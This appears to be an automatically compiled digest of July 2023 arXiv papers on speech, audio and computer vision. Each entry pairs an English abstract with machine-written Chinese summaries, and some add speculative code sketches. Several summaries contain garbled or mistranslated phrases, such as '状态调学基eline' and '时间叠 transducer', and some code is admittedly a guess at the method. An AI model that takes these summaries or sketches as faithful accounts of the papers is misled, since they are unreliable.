  • methods: 本文使用MultiTaskV3检测分割网络作为感知系统的基础,并对其进行了适当的训练、量化和实现于AMD Xilinx Kria KV260 Vision AI嵌入式平台。通过这种设备,可以并行加速计算,同时减少能耗。
  • results: 实验结果显示,该系统在对象检测和图像分割方面具有高度准确性(mAP大于97%和mIoU大于90%),并且在实时性和能效性方面也具有优异表现。
    Abstract Perception and control systems for autonomous vehicles are an active area of scientific and industrial research. These solutions should be characterised by high efficiency in recognising obstacles and other environmental elements in different road conditions, real-time capability, and energy efficiency. Achieving such functionality requires an appropriate algorithm and a suitable computing platform. In this paper, we have used the MultiTaskV3 detection-segmentation network as the basis for a perception system that can perform both functionalities within a single architecture. It was appropriately trained, quantised, and implemented on the AMD Xilinx Kria KV260 Vision AI embedded platform. By using this device, it was possible to parallelise and accelerate the computations. Furthermore, the whole system consumes relatively little power compared to a CPU-based implementation (an average of 5 watts, compared to the minimum of 55 watts for weaker CPUs, and the small size (119mm x 140mm x 36mm) of the platform allows it to be used in devices where the amount of space available is limited. It also achieves an accuracy higher than 97% of the mAP (mean average precision) for object detection and above 90% of the mIoU (mean intersection over union) for image segmentation. The article also details the design of the Mecanum wheel vehicle, which was used to test the proposed solution in a mock-up city.
    摘要 自动驾驶车辆的感知和控制系统是科学研究和工业领域的活跃方向。这些解决方案应能够在不同路况下高效地识别障碍物和其他环境元素，并具备实时性和能效性。实现这种功能需要合适的算法和合适的计算平台。在这篇论文中，我们使用MultiTaskV3检测-分割网络作为感知系统的基础，可以在单一架构内同时完成这两项功能。该网络经过适当的训练、量化，并部署在AMD Xilinx Kria KV260 Vision AI嵌入式平台上。借助该设备，可以并行化并加速计算。此外，整个系统的功耗相对较低，平均仅约5瓦特（相比之下，较弱的CPU实现最低也需约55瓦特），而且平台尺寸较小（119mm x 140mm x 36mm），可以在空间有限的设备中使用。它在目标检测上达到了高于97%的mAP，在图像分割上达到了高于90%的mIoU。文章还详细介绍了用于在模拟城市中测试所提方案的Mecanum轮车的设计。

cs.SD - 2023-07-17

TST: Time-Sparse Transducer for Automatic Speech Recognition

  • paper_url: http://arxiv.org/abs/2307.08323
  • repo_url: None
  • paper_authors: Xiaohui Zhang, Mangui Liang, Zhengkun Tian, Jiangyan Yi, Jianhua Tao
  • for: 这篇论文主要是为了解决端到端模型,特别是循环神经网络推导器(RNN-T)在语音识别中的长序处理问题。
  • methods: 作者提出了一个名为时间稀疏转换器 (time-sparse transducer) 的模型，内置时间稀疏机制。该机制通过降低隐藏状态的时间分辨率获得中间表示，然后使用加权平均算法融合这些表示，生成稀疏的隐藏状态。
  • results: 实验结果显示,与 RNN-T 相比,时间叠 transducer 的字元错误率几乎相同,并且实时因子为原始的 50%。通过调整时间解析,时间叠 transducer 可以降低实时因子至原始的 16.54%,但是这需要付出一些精度的损失(4.94%)。
    Abstract End-to-end model, especially Recurrent Neural Network Transducer (RNN-T), has achieved great success in speech recognition. However, transducer requires a great memory footprint and computing time when processing a long decoding sequence. To solve this problem, we propose a model named time-sparse transducer, which introduces a time-sparse mechanism into transducer. In this mechanism, we obtain the intermediate representations by reducing the time resolution of the hidden states. Then the weighted average algorithm is used to combine these representations into sparse hidden states followed by the decoder. All the experiments are conducted on a Mandarin dataset AISHELL-1. Compared with RNN-T, the character error rate of the time-sparse transducer is close to RNN-T and the real-time factor is 50.00% of the original. By adjusting the time resolution, the time-sparse transducer can also reduce the real-time factor to 16.54% of the original at the expense of a 4.94% loss of precision.
    摘要 端到端模型，特别是Recurrent Neural Network Transducer (RNN-T)，在语音识别中取得了很大成功。然而，transducer在处理较长的解码序列时需要较大的内存占用和计算时间。为解决这个问题，我们提出了一种名为时间稀疏转换器（time-sparse transducer）的模型，它在transducer中引入了时间稀疏机制。在这种机制中，我们通过降低隐藏状态的时间分辨率来获得中间表示，然后使用加权平均算法将这些表示融合为稀疏的隐藏状态，再送入解码器。所有实验均在普通话数据集AISHELL-1上进行。结果表明，时间稀疏转换器的字符错误率与RNN-T接近，实时因子为原来的50.00%。通过调整时间分辨率，时间稀疏转换器还可以将实时因子降低至原来的16.54%，代价是4.94%的精度损失。
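A minimal reading of the time-sparse mechanism is shown below: consecutive hidden states are pooled into one state per window using a learned weighted average. The window size and the way the weights are computed are assumptions; the paper's exact design may differ:

```python
import torch
import torch.nn as nn
import torch.nn.functional as F

class TimeSparsePool(nn.Module):
    """Collapse every `stride` consecutive hidden states into one sparse state
    via a learned weighted average along the time axis."""
    def __init__(self, hidden_dim, stride=4):
        super().__init__()
        self.stride = stride
        self.score = nn.Linear(hidden_dim, 1)

    def forward(self, h):                        # h: (batch, T, hidden_dim)
        b, t, d = h.shape
        pad = (-t) % self.stride
        if pad:
            h = F.pad(h, (0, 0, 0, pad))         # pad the time dimension
        h = h.view(b, -1, self.stride, d)        # (batch, T', stride, d)
        w = torch.softmax(self.score(h), dim=2)  # weights within each window
        return (w * h).sum(dim=2)                # (batch, T', d)
```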

ivrit.ai: A Comprehensive Dataset of Hebrew Speech for AI Research and Development

  • paper_url: http://arxiv.org/abs/2307.08720
  • repo_url: https://github.com/yairl/ivrit.ai
  • paper_authors: Yanir Marmor, Kinneret Misgav, Yair Lifshitz
  • for: 提高希伯来语自动语音识别技术的研究和开发
  • methods: 使用了3,300小时的希伯来语音数据,包括1,000多个不同的说话人,并提供了不同的研究需求的三种数据形式:原始未处理的音频数据、后Voice Activity Detection的数据,以及部分转写的数据
  • results: 提供了一个大量的希伯来语音数据资源,可以免费使用,对研究人员、开发者和商业机构都是一个重要的资源,可以推进希伯来语言在人工智能技术中的发展
    Abstract We introduce "ivrit.ai", a comprehensive Hebrew speech dataset, addressing the distinct lack of extensive, high-quality resources for advancing Automated Speech Recognition (ASR) technology in Hebrew. With over 3,300 speech hours and a over a thousand diverse speakers, ivrit.ai offers a substantial compilation of Hebrew speech across various contexts. It is delivered in three forms to cater to varying research needs: raw unprocessed audio; data post-Voice Activity Detection, and partially transcribed data. The dataset stands out for its legal accessibility, permitting use at no cost, thereby serving as a crucial resource for researchers, developers, and commercial entities. ivrit.ai opens up numerous applications, offering vast potential to enhance AI capabilities in Hebrew. Future efforts aim to expand ivrit.ai further, thereby advancing Hebrew's standing in AI research and technology.
    摘要 我们介绍“ivrit.ai”,一个全面的希伯来语 speech dataset,填补了希伯来语自动语音识别(ASR)技术的缺乏丰富资源。该dataset包含了超过3,300小时的希伯来语 speech,来自超过1,000名多样化的说话者,覆盖了不同的场景。它提供了三种形式来满足不同的研究需求:原始的未处理音频数据,经过语音活动检测后的数据,以及部分转写的数据。该dataset的legal accessible,即可免费使用,因此成为了研究人员、开发者和商业机构的重要资源。“ivrit.ai”开启了许多应用程序,具有很大的潜力提高希伯来语AI技术。未来努力将ivrit.ai继续扩展,以提高希伯来语在AI研究和技术中的地位。

BASS: Block-wise Adaptation for Speech Summarization

  • paper_url: http://arxiv.org/abs/2307.08217
  • repo_url: None
  • paper_authors: Roshan Sharma, Kenneth Zheng, Siddhant Arora, Shinji Watanabe, Rita Singh, Bhiksha Raj
  • for: 本研究旨在提高端到端speech summarization的性能,但现有模型受限于计算能力,因此通常只能使用宽度有限的输入序列进行训练。
  • methods: 本研究提出了一种逐块训练摘要模型的方法,通过分割输入序列进行批处理,以便在不同块之间传递语义上下文。
  • results: 实验结果表明,采用逐块训练方法可以提高ROUGE-L指标的表现,相比于 truncated input 基准值,提高了3个绝对点。
    Abstract End-to-end speech summarization has been shown to improve performance over cascade baselines. However, such models are difficult to train on very large inputs (dozens of minutes or hours) owing to compute restrictions and are hence trained with truncated model inputs. Truncation leads to poorer models, and a solution to this problem rests in block-wise modeling, i.e., processing a portion of the input frames at a time. In this paper, we develop a method that allows one to train summarization models on very long sequences in an incremental manner. Speech summarization is realized as a streaming process, where hypothesis summaries are updated every block based on new acoustic information. We devise and test strategies to pass semantic context across the blocks. Experiments on the How2 dataset demonstrate that the proposed block-wise training method improves by 3 points absolute on ROUGE-L over a truncated input baseline.
    摘要 端到端语音摘要已被证明优于级联基线。但由于计算限制，这类模型难以在极长输入（数十分钟或数小时）上训练，因此通常使用截断后的模型输入。截断会导致模型性能变差，解决方案在于分块建模，即每次只处理输入帧的一部分。在这篇论文中，我们开发了一种可以在极长序列上以增量方式训练摘要模型的方法。语音摘要被实现为一个流式过程，假设摘要在每个块上根据新的声学信息进行更新。我们还设计并测试了在块之间传递语义上下文的策略。在How2数据集上的实验表明，所提的分块训练方法相比截断输入基线在ROUGE-L上提升了3个绝对百分点。
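A skeleton of the block-wise procedure is sketched below: acoustic features are processed block by block, and the running hypothesis summary is fed back as context so semantic information carries across blocks. `summarizer` is a placeholder for any encoder-decoder model, and this context-passing scheme is only one of the strategies the paper investigates:

```python
def blockwise_summarize(features, summarizer, block_size=3000):
    """features: (T, D) acoustic feature sequence.
    summarizer(block, context) -> updated hypothesis summary (string or token list).
    The hypothesis is refreshed after every block based on new acoustic information."""
    summary = ""
    for start in range(0, len(features), block_size):
        block = features[start:start + block_size]
        summary = summarizer(block, context=summary)   # pass semantic context forward
    return summary
```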

Exploring Binary Classification Loss For Speaker Verification

  • paper_url: http://arxiv.org/abs/2307.08205
  • repo_url: https://github.com/hunterhuan/sphereface2_speaker_verification
  • paper_authors: Bing Han, Zhengyang Chen, Yanmin Qian
  • for: 这个论文旨在提高speaker verification任务中的表现,减少因为训练和评估频道的差异所导致的性能下降。
  • methods: 这个论文使用了多个二元分类器来训练speaker模型,而不是传统的多类别分类法,以提高表现的稳定性和精度。
  • results: 实验结果显示，SphereFace2方法可以提升speaker模型的表现，特别是在困难的试验 (hard trials) 中，并且可以与大margin fine-tuning策略相结合以获得更好的结果。此外，SphereFace2方法还对类别噪声标签表现出较强的鲁棒性，可以在伪标签不够准确的半监督训练场景中取得更好的表现。
    Abstract The mismatch between close-set training and open-set testing usually leads to significant performance degradation for speaker verification task. For existing loss functions, metric learning-based objectives depend strongly on searching effective pairs which might hinder further improvements. And popular multi-classification methods are usually observed with degradation when evaluated on unseen speakers. In this work, we introduce SphereFace2 framework which uses several binary classifiers to train the speaker model in a pair-wise manner instead of performing multi-classification. Benefiting from this learning paradigm, it can efficiently alleviate the gap between training and evaluation. Experiments conducted on Voxceleb show that the SphereFace2 outperforms other existing loss functions, especially on hard trials. Besides, large margin fine-tuning strategy is proven to be compatible with it for further improvements. Finally, SphereFace2 also shows its strong robustness to class-wise noisy labels which has the potential to be applied in the semi-supervised training scenario with inaccurate estimated pseudo labels. Codes are available in https://github.com/Hunterhuan/sphereface2_speaker_verification
    摘要 闭集训练与开集测试之间的不匹配通常会导致说话人确认任务的性能显著下降。在现有的损失函数中，基于度量学习的目标强烈依赖于搜索有效的样本对，这可能阻碍进一步的提升；而流行的多分类方法在未见说话人上评估时往往出现性能退化。在这项工作中，我们引入了SphereFace2框架，它使用多个二分类器以成对的方式训练说话人模型，而不是进行多分类。得益于这种学习范式，它可以有效地缓解训练与评估之间的差距。在Voxceleb上进行的实验表明，SphereFace2优于其他现有的损失函数，尤其是在困难试验 (hard trials) 上。此外，大间隔微调策略与之兼容，可以带来进一步的提升。最后，SphereFace2还展现了对类别噪声标签的强鲁棒性，有潜力应用于伪标签估计不准确的半监督训练场景。代码可在 https://github.com/Hunterhuan/sphereface2_speaker_verification 获取。
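The core idea, one binary classifier per speaker instead of a single softmax over all speakers, can be sketched with a simplified margin-based binary loss. This is not the exact SphereFace2 formulation (which includes additional scaling and balancing terms); scale and margin values are assumptions:

```python
import torch
import torch.nn.functional as F

def binary_classifier_loss(embeddings, labels, weight, scale=32.0, margin=0.2):
    """embeddings: (B, D) speaker embeddings; labels: (B,) speaker ids.
    weight: (C, D) learnable class anchors, one per training speaker.
    Each of the C classifiers is trained as an independent binary problem:
    positive for its own speaker, negative for everyone else."""
    cos = F.linear(F.normalize(embeddings), F.normalize(weight))      # (B, C) cosine scores
    target = F.one_hot(labels, num_classes=weight.size(0)).float()
    logits = scale * (cos - margin * target)        # margin applied only to positive pairs
    return F.binary_cross_entropy_with_logits(logits, target)
```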

eess.AS - 2023-07-17

Dynamic Kernel Convolution Network with Scene-dedicate Training for Sound Event Localization and Detection

  • paper_url: http://arxiv.org/abs/2307.08239
  • repo_url: None
  • paper_authors: Siwei Huang, Jianfeng Chen, Jisheng Bai, Yafei Jia, Dongzhe Zhang
  • for: 这篇论文的目的是提出一种高效的声事件地理位置检测和检测系统,用于真实的空间声场。
  • methods: 该系统使用动态核心 convolution 模块来适应不同的感知范围,以及 SELDnet 和 EINv2 框架。此外,在训练阶段,还引入了两种场景专门的策略以提高系统在真实空间声场中的通用性。
  • results: 实验结果表明,提出的系统在 Sony-TAu 真实空间声场 dataset 上的表现出色,并超过了 fixes-kernel convolution SELD 系统。此外,该系统在 DCASE SELD 任务中获得了0.348的 SELD 分数,超过了 State-of-the-Art 方法。
    Abstract DNN-based methods have shown high performance in sound event localization and detection(SELD). While in real spatial sound scenes, reverberation and the imbalanced presence of various sound events increase the complexity of the SELD task. In this paper, we propose an effective SELD system in real spatial scenes.In our approach, a dynamic kernel convolution module is introduced after the convolution blocks to adaptively model the channel-wise features with different receptive fields. Secondly, we incorporate the SELDnet and EINv2 framework into the proposed SELD system with multi-track ACCDOA. Moreover, two scene-dedicated strategies are introduced into the training stage to improve the generalization of the system in realistic spatial sound scenes. Finally, we apply data augmentation methods to extend the dataset using channel rotation, spatial data synthesis. Four joint metrics are used to evaluate the performance of the SELD system on the Sony-TAu Realistic Spatial Soundscapes 2022 dataset.Experimental results show that the proposed systems outperform the fixed-kernel convolution SELD systems. In addition, the proposed system achieved an SELD score of 0.348 in the DCASE SELD task and surpassed the SOTA methods.
    摘要 基于深度神经网络 (DNN) 的方法在声音事件定位与检测 (SELD) 中表现出很高的性能。然而，在实际空间声场中，混响和各类声事件的不均衡存在使得SELD任务变得更加复杂。在这篇论文中，我们提出了一个适用于实际空间声场的有效SELD系统。我们的方法包括：1. 在卷积块后引入动态核卷积模块，以自适应地用不同感受野建模通道特征。2. 将SELDnet和EINv2框架结合到所提SELD系统中，并使用多轨ACCDOA。3. 在训练阶段引入两种面向场景的策略，以提高系统在真实空间声场中的泛化能力。4. 使用通道旋转和空间数据合成等数据增强方法扩展数据集。我们使用四个联合评价指标来评估SELD系统在 Sony-TAu Realistic Spatial Soundscapes 2022 数据集上的性能。实验结果表明，所提系统优于固定核卷积的SELD系统，并在DCASE SELD任务中取得了0.348的SELD分数，超过了当前最先进的方法。
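A plausible sketch of a dynamic kernel convolution module is given below: parallel branches with different kernel sizes (receptive fields) are fused with input-dependent attention weights. The branch count, kernel sizes, and gating design are assumptions, since the abstract does not spell them out:

```python
import torch
import torch.nn as nn

class DynamicKernelConv(nn.Module):
    """Parallel convolutions with different receptive fields, fused by
    branch-attention weights computed from the globally pooled input."""
    def __init__(self, channels, kernel_sizes=(3, 5, 7)):
        super().__init__()
        self.branches = nn.ModuleList(
            [nn.Conv2d(channels, channels, k, padding=k // 2) for k in kernel_sizes])
        self.gate = nn.Sequential(
            nn.AdaptiveAvgPool2d(1), nn.Flatten(),
            nn.Linear(channels, len(kernel_sizes)), nn.Softmax(dim=1))

    def forward(self, x):                        # x: (B, C, F, T) spectrogram features
        weights = self.gate(x)                   # (B, num_branches)
        outs = torch.stack([branch(x) for branch in self.branches], dim=1)
        return (weights[:, :, None, None, None] * outs).sum(dim=1)
```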

Adapting Large Language Model with Speech for Fully Formatted End-to-End Speech Recognition

  • paper_url: http://arxiv.org/abs/2307.08234
  • repo_url: https://github.com/openai/whisper
  • paper_authors: Shaoshi Ling, Yuxuan Hu, Shuangbei Qian, Guoli Ye, Yao Qian, Yifan Gong, Ed Lin, Michael Zeng
  • for: 这个论文的目的是提高端到端语音识别(E2E ASR)模型的性能。
  • methods: 这个论文使用了预训练的大型语言模型(LLMs)来改进E2E ASR模型的性能。
  • results: 该方法可以有效地利用预训练的LLMs来生成更易读的ASR转录。对于具有不同领域的完整E2E ASR转录任务,我们的模型可以超越强大的ASR模型,如Whisper,在识别错误率方面。
    Abstract Most end-to-end (E2E) speech recognition models are composed of encoder and decoder blocks that perform acoustic and language modeling functions. Pretrained large language models (LLMs) have the potential to improve the performance of E2E ASR. However, integrating a pretrained language model into an E2E speech recognition model has shown limited benefits due to the mismatches between text-based LLMs and those used in E2E ASR. In this paper, we explore an alternative approach by adapting a pretrained LLMs to speech. Our experiments on fully-formatted E2E ASR transcription tasks across various domains demonstrate that our approach can effectively leverage the strengths of pretrained LLMs to produce more readable ASR transcriptions. Our model, which is based on the pretrained large language models with either an encoder-decoder or decoder-only structure, surpasses strong ASR models such as Whisper, in terms of recognition error rate, considering formats like punctuation and capitalization as well.
    摘要 大多数端到端（E2E）语音识别模型由编码器和解码器模块组成，分别承担声学建模和语言建模功能。预训练大型语言模型（LLMs）有潜力提升E2E ASR的性能。然而，将预训练语言模型集成到E2E语音识别模型中收益有限，这主要是因为基于文本的LLMs与E2E ASR中使用的模型之间存在不匹配。在这篇论文中，我们探讨了一种替代方法，即将预训练LLMs适配到语音。我们在多个领域的完全格式化E2E ASR转写任务上的实验表明，该方法可以有效利用预训练LLMs的优势，生成更易读的ASR转写。我们的模型基于预训练大型语言模型，可采用编码器-解码器或仅解码器 (decoder-only) 结构，在识别错误率（同时考虑标点、大小写等格式）方面超越了Whisper等强大的ASR模型。

cs.CV - 2023-07-17

Identity-Preserving Aging of Face Images via Latent Diffusion Models

  • paper_url: http://arxiv.org/abs/2307.08585
  • repo_url: None
  • paper_authors: Sudipta Banerjee, Govind Mittal, Ameya Joshi, Chinmay Hegde, Nasir Memon
  • for: 这个论文是为了提高自动人脸识别系统的性能而写的。
  • methods: 这个论文使用了文本到图像扩散模型来 sintetically 年轻和年老人脸图像。
  • results: 这个方法可以通过几个尝试的训练来实现高度的视觉实际性和生物度的精度。在两个标准测试集(CelebA和AgeDB)上,这个方法比现有的状态调学基eline减少了约44%的False Non-Match Rate。
    Abstract The performance of automated face recognition systems is inevitably impacted by the facial aging process. However, high quality datasets of individuals collected over several years are typically small in scale. In this work, we propose, train, and validate the use of latent text-to-image diffusion models for synthetically aging and de-aging face images. Our models succeed with few-shot training, and have the added benefit of being controllable via intuitive textual prompting. We observe high degrees of visual realism in the generated images while maintaining biometric fidelity measured by commonly used metrics. We evaluate our method on two benchmark datasets (CelebA and AgeDB) and observe significant reduction (~44%) in the False Non-Match Rate compared to existing state-of the-art baselines.
    摘要 自动人脸识别系统的表现不可避免地受到人脸老化过程的影响。然而，跨越数年采集的高质量个人数据集通常规模较小。在这项工作中，我们提出、训练并验证了使用潜在的文本到图像扩散模型来合成地增加和减少人脸图像的年龄。我们的模型只需少量样本训练即可取得良好效果，并且可以通过直观的文本提示进行控制。生成的图像具有高度的视觉真实感，同时在常用指标下保持了生物特征保真度。我们在两个标准数据集（CelebA和AgeDB）上进行评估，与现有最先进基线相比，False Non-Match Rate 下降约44%。

Scale-Aware Modulation Meet Transformer

  • paper_url: http://arxiv.org/abs/2307.08579
  • repo_url: https://github.com/afeng-x/smt
  • paper_authors: Weifeng Lin, Ziheng Wu, Jiayu Chen, Jun Huang, Lianwen Jin
  • for: The paper proposes a new vision Transformer called Scale-Aware Modulation Transformer (SMT) that can handle various downstream tasks efficiently by combining convolutional networks and vision Transformers.
  • methods: The proposed SMT includes two novel designs: Multi-Head Mixed Convolution (MHMC) and Scale-Aware Aggregation (SAA) modules. These modules enhance convolutional modulation and allow the network to capture multi-scale features and fuse information effectively.
  • results: The proposed SMT significantly outperforms existing state-of-the-art models across a wide range of visual tasks, including image classification, object detection, and semantic segmentation. Specifically, SMT achieves 82.2% and 84.3% top-1 accuracy on ImageNet-1K, and outperforms the Swin Transformer counterpart by 4.2 and 1.3 mAP on COCO for object detection and 2.0 and 1.1 mIoU on ADE20K for semantic segmentation.
    Abstract This paper presents a new vision Transformer, Scale-Aware Modulation Transformer (SMT), that can handle various downstream tasks efficiently by combining the convolutional network and vision Transformer. The proposed Scale-Aware Modulation (SAM) in the SMT includes two primary novel designs. Firstly, we introduce the Multi-Head Mixed Convolution (MHMC) module, which can capture multi-scale features and expand the receptive field. Secondly, we propose the Scale-Aware Aggregation (SAA) module, which is lightweight but effective, enabling information fusion across different heads. By leveraging these two modules, convolutional modulation is further enhanced. Furthermore, in contrast to prior works that utilized modulations throughout all stages to build an attention-free network, we propose an Evolutionary Hybrid Network (EHN), which can effectively simulate the shift from capturing local to global dependencies as the network becomes deeper, resulting in superior performance. Extensive experiments demonstrate that SMT significantly outperforms existing state-of-the-art models across a wide range of visual tasks. Specifically, SMT with 11.5M / 2.4GFLOPs and 32M / 7.7GFLOPs can achieve 82.2% and 84.3% top-1 accuracy on ImageNet-1K, respectively. After pretrained on ImageNet-22K in 224^2 resolution, it attains 87.1% and 88.1% top-1 accuracy when finetuned with resolution 224^2 and 384^2, respectively. For object detection with Mask R-CNN, the SMT base trained with 1x and 3x schedule outperforms the Swin Transformer counterpart by 4.2 and 1.3 mAP on COCO, respectively. For semantic segmentation with UPerNet, the SMT base test at single- and multi-scale surpasses Swin by 2.0 and 1.1 mIoU respectively on the ADE20K.
    摘要 In contrast to prior works that use modulations throughout all stages to build an attention-free network, the proposed Evolutionary Hybrid Network (EHN) can effectively simulate the shift from capturing local to global dependencies as the network becomes deeper, resulting in superior performance.Extensive experiments show that SMT significantly outperforms existing state-of-the-art models across a wide range of visual tasks. Specifically, SMT with 11.5M parameters and 2.4GFLOPs can achieve 82.2% top-1 accuracy on ImageNet-1K, while SMT with 32M parameters and 7.7GFLOPs can achieve 84.3% top-1 accuracy. After pretraining on ImageNet-22K in 224^2 resolution, the model can achieve 87.1% and 88.1% top-1 accuracy when finetuned with resolution 224^2 and 384^2, respectively.In object detection with Mask R-CNN, the SMT base trained with 1x and 3x schedule outperforms the Swin Transformer counterpart by 4.2 and 1.3 mAP on COCO, respectively. For semantic segmentation with UPerNet, the SMT base test at single- and multi-scale surpasses Swin by 2.0 and 1.1 mIoU, respectively, on the ADE20K.
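The Multi-Head Mixed Convolution idea, splitting channels into heads and giving each head a different kernel size, can be sketched as follows. The depth-wise choice and the kernel set are one plausible reading, not necessarily the paper's exact configuration:

```python
import torch
import torch.nn as nn

class MultiHeadMixedConv(nn.Module):
    """Split channels into heads; each head uses a depth-wise convolution with a
    different kernel size, so the layer mixes several receptive fields at once."""
    def __init__(self, channels, kernel_sizes=(3, 5, 7, 9)):
        super().__init__()
        assert channels % len(kernel_sizes) == 0
        self.split = channels // len(kernel_sizes)
        self.convs = nn.ModuleList(
            [nn.Conv2d(self.split, self.split, k, padding=k // 2, groups=self.split)
             for k in kernel_sizes])

    def forward(self, x):                                # x: (B, C, H, W)
        chunks = torch.split(x, self.split, dim=1)
        return torch.cat([conv(c) for conv, c in zip(self.convs, chunks)], dim=1)
```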

On the Fly Neural Style Smoothing for Risk-Averse Domain Generalization

  • paper_url: http://arxiv.org/abs/2307.08551
  • repo_url: https://github.com/akshaymehra24/riskaversedg
  • paper_authors: Akshay Mehra, Yunbei Zhang, Bhavya Kailkhura, Jihun Hamm
  • for: 该论文目的是提出一种测试时 neural style smoothing (TT-NSS) 方法，以提高预测不同域的风险敏感性。
  • methods: 该方法使用一个"风格平滑"的 DG 分类器进行测试时预测，并使用 neural style transfer 模块来快速地在测试图像上实现风格平滑。
  • results: 实验结果表明，TT-NSS 和 NSS 可以提高 DG 分类器在未经见过的域上的预测精度和风险敏感性。
    Abstract Achieving high accuracy on data from domains unseen during training is a fundamental challenge in domain generalization (DG). While state-of-the-art DG classifiers have demonstrated impressive performance across various tasks, they have shown a bias towards domain-dependent information, such as image styles, rather than domain-invariant information, such as image content. This bias renders them unreliable for deployment in risk-sensitive scenarios such as autonomous driving where a misclassification could lead to catastrophic consequences. To enable risk-averse predictions from a DG classifier, we propose a novel inference procedure, Test-Time Neural Style Smoothing (TT-NSS), that uses a "style-smoothed" version of the DG classifier for prediction at test time. Specifically, the style-smoothed classifier classifies a test image as the most probable class predicted by the DG classifier on random re-stylizations of the test image. TT-NSS uses a neural style transfer module to stylize a test image on the fly, requires only black-box access to the DG classifier, and crucially, abstains when predictions of the DG classifier on the stylized test images lack consensus. Additionally, we propose a neural style smoothing (NSS) based training procedure that can be seamlessly integrated with existing DG methods. This procedure enhances prediction consistency, improving the performance of TT-NSS on non-abstained samples. Our empirical results demonstrate the effectiveness of TT-NSS and NSS at producing and improving risk-averse predictions on unseen domains from DG classifiers trained with SOTA training methods on various benchmark datasets and their variations.
    摘要 Specifically, the style-smoothed classifier predicts the most probable class based on the DG classifier's predictions on random re-stylizations of the test image. TT-NSS uses a neural style transfer module to stylize the test image on the fly, requires only black-box access to the DG classifier, and abstains when the DG classifier's predictions on the stylized test images lack consensus. Additionally, we propose a neural style smoothing (NSS) based training procedure that can be integrated with existing DG methods. This procedure enhances prediction consistency, improving the performance of TT-NSS on non-abstained samples.Our empirical results show that TT-NSS and NSS are effective in producing and improving risk-averse predictions on unseen domains for DG classifiers trained with state-of-the-art methods on various benchmark datasets and their variations.
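The inference procedure can be sketched directly from the description above: re-stylize the test image several times, classify each version with black-box access to the DG classifier, predict the majority class, and abstain when agreement is too weak. `stylize`, `style_bank`, and the consensus threshold are placeholders:

```python
import collections
import random

def tt_nss_predict(image, classifier, stylize, style_bank, n_samples=16, consensus=0.6):
    """classifier(img) -> class id (black-box access only).
    stylize(img, style) -> re-stylized image (e.g., via a neural style transfer module).
    Returns the majority class, or None (abstain) if agreement falls below `consensus`."""
    votes = collections.Counter(
        classifier(stylize(image, random.choice(style_bank))) for _ in range(n_samples))
    label, count = votes.most_common(1)[0]
    return label if count / n_samples >= consensus else None
```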

Improving Data Efficiency for Plant Cover Prediction with Label Interpolation and Monte-Carlo Cropping

  • paper_url: http://arxiv.org/abs/2307.08559
  • repo_url: None
  • paper_authors: Matthias Körschens, Solveig Franziska Bucher, Christine Römermann, Joachim Denzler
  • for: 这个论文主要针对的是如何使用自动摄像头系统和深度学习算法对植被plot进行自动分类。
  • methods: 这篇论文使用了自动摄像头系统收集高分辨率图像，然后使用深度学习算法对图像进行分类。另外，论文还引入了一种新的 Monte-Carlo Cropping 方法，用于处理高分辨率图像，并且可以增加训练数据集的大小。
  • results: 论文的实验结果表明，使用自动摄像头系统和深度学习算法可以对植被plot进行高精度的自动分类，并且可以提高种类、社区和分割指标。此外，Monte-Carlo Cropping 方法也能够提高训练数据集的大小和模型的性能。
    Abstract The plant community composition is an essential indicator of environmental changes and is, for this reason, usually analyzed in ecological field studies in terms of the so-called plant cover. The manual acquisition of this kind of data is time-consuming, laborious, and prone to human error. Automated camera systems can collect high-resolution images of the surveyed vegetation plots at a high frequency. In combination with subsequent algorithmic analysis, it is possible to objectively extract information on plant community composition quickly and with little human effort. An automated camera system can easily collect the large amounts of image data necessary to train a Deep Learning system for automatic analysis. However, due to the amount of work required to annotate vegetation images with plant cover data, only few labeled samples are available. As automated camera systems can collect many pictures without labels, we introduce an approach to interpolate the sparse labels in the collected vegetation plot time series down to the intermediate dense and unlabeled images to artificially increase our training dataset to seven times its original size. Moreover, we introduce a new method we call Monte-Carlo Cropping. This approach trains on a collection of cropped parts of the training images to deal with high-resolution images efficiently, implicitly augment the training images, and speed up training. We evaluate both approaches on a plant cover dataset containing images of herbaceous plant communities and find that our methods lead to improvements in the species, community, and segmentation metrics investigated.
    摘要 植物群落组成是环境变化的重要指标，因此在生态学野外研究中通常以植被覆盖度 (plant cover) 的形式进行分析。这类数据的人工采集耗时、费力且容易出现人为误差。自动相机系统可以高频率地采集被调查植被样方的高分辨率图像，结合后续的算法分析，便能够以较少的人力客观、快速地提取植物群落组成信息。自动相机系统可以轻松采集训练深度学习系统进行自动分析所需的大量图像数据。然而，由于为植被图像标注植被覆盖度的工作量很大，带标签的样本很少。鉴于自动相机系统可以采集大量无标签图像，我们提出了一种方法，将采集到的植被样方时间序列中稀疏的标签插值到中间的、密集的无标签图像上，从而将训练数据集人工扩大到原来的七倍。此外，我们提出了一种名为 Monte-Carlo Cropping 的新方法，通过在训练图像的裁剪块集合上训练，从而高效地处理高分辨率图像、隐式地扩增训练图像并加快训练速度。我们在包含草本植物群落图像的植被覆盖度数据集上评估了这两种方法，发现它们在所考察的物种、群落和分割指标上均带来了提升。
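The cropping step of Monte-Carlo Cropping can be sketched as simple random patch sampling from the high-resolution plot image and its label map; training on many such crops implicitly augments the data. Crop size and count below are assumed values:

```python
import random

def monte_carlo_crops(image, label_map, crop_size=512, n_crops=8):
    """Sample n_crops random patches from a high-resolution vegetation image and
    its pixel-wise label map. Training on many such crops keeps memory use bounded
    while implicitly augmenting the training data."""
    h, w = image.shape[:2]
    crops = []
    for _ in range(n_crops):
        top = random.randint(0, h - crop_size)
        left = random.randint(0, w - crop_size)
        crops.append((image[top:top + crop_size, left:left + crop_size],
                      label_map[top:top + crop_size, left:left + crop_size]))
    return crops
```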

Reconstructed Convolution Module Based Look-Up Tables for Efficient Image Super-Resolution

  • paper_url: http://arxiv.org/abs/2307.08544
  • repo_url: https://github.com/liuguandu/rc-lut
  • paper_authors: Guandu Liu, Yukang Ding, Mading Li, Ming Sun, Xing Wen, Bin Wang
  • for: 提高单图超分辨率(SR)任务中的灵活性和效率。
  • methods: 提出了一种新的重构 convolution(RC)模块,通过分离通道和空间计算来减少 LUT 的存储量,同时可以扩大 RF 的大小。
  • results: 比对于 state-of-the-art LUT-based SR 方法,提出的 RCLUT 方法可以在五个 популяр的benchmark dataset上 achieve 9 倍的 RF 大小扩展和优秀的性能,并且可以作为 LUT-based SR 方法的插件来提高其效果。
